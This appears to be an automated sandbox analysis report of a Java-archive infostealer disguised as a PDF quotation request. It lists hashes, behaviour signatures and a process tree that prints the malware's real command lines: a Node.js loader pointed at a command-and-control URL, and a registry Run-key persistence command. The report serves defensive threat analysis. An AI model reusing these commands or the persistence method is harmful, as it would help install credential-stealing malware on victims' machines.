Analysis
-
max time kernel
137s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
30-06-2020 08:45
Static task
static1
Behavioral task
behavioral1
Sample
EES RFQ 56-34___PDF.jar
Resource
win7
Behavioral task
behavioral2
Sample
EES RFQ 56-34___PDF.jar
Resource
win10v200430
General
-
Target
EES RFQ 56-34___PDF.jar
-
Size
11KB
-
MD5
8899cc56f4e52f5497fb7ec8c960dbb9
-
SHA1
f5fc681e85c69c70b7ec6d5d223f5d8d5b4bbe04
-
SHA256
65b9dccf61b9749c5380bf61cc360b3d7e8ad8c50b843e4104c5040a10a79790
-
SHA512
1aa43d6fe686e6180806d53de82081d25e4902b13cdaea227799fea35f5bffab101bc254a30bad5134d6668381ac2662520c7f138ad965a788bd6f23e9e34b91
Malware Config
Signatures
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 14 wtfismyip.com 16 wtfismyip.com -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
java.exenode.execmd.exedescription pid process target process PID 652 wrote to memory of 1240 652 java.exe node.exe PID 652 wrote to memory of 1240 652 java.exe node.exe PID 1240 wrote to memory of 3732 1240 node.exe cmd.exe PID 1240 wrote to memory of 3732 1240 node.exe cmd.exe PID 3732 wrote to memory of 2724 3732 cmd.exe reg.exe PID 3732 wrote to memory of 2724 3732 cmd.exe reg.exe PID 1240 wrote to memory of 3644 1240 node.exe node.exe PID 1240 wrote to memory of 3644 1240 node.exe node.exe -
Executes dropped EXE 2 IoCs
Processes:
node.exenode.exepid process 1240 node.exe 3644 node.exe -
Loads dropped DLL 4 IoCs
Processes:
node.exepid process 3644 node.exe 3644 node.exe 3644 node.exe 3644 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
node.exepid process 3644 node.exe 3644 node.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-9203296d = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-9203296d.cmd\"" reg.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\EES RFQ 56-34___PDF.jar"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:2604@qhub-subscription.store.qua.one --register-startup --central-base-url https://dde.bounceme.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-9203296d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-9203296d.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-9203296d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-9203296d.cmd\""4⤵
- Adds Run entry to start application
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:2604@qhub-subscription.store.qua.one --register-startup --central-base-url https://dde.bounceme.net3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ffi-napi\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\native-reg\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ref-napi\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\sqlite3\lib\binding\node-v79-win32-x64\node_sqlite3.node
-
memory/1240-107-0x0000000000000000-mapping.dmp
-
memory/1240-110-0x000003B259F00000-0x000003B259F01000-memory.dmpFilesize
4KB
-
memory/2724-113-0x0000000000000000-mapping.dmp
-
memory/3644-114-0x0000000000000000-mapping.dmp
-
memory/3644-116-0x000002BC2BE40000-0x000002BC2BE41000-memory.dmpFilesize
4KB
-
memory/3732-112-0x0000000000000000-mapping.dmp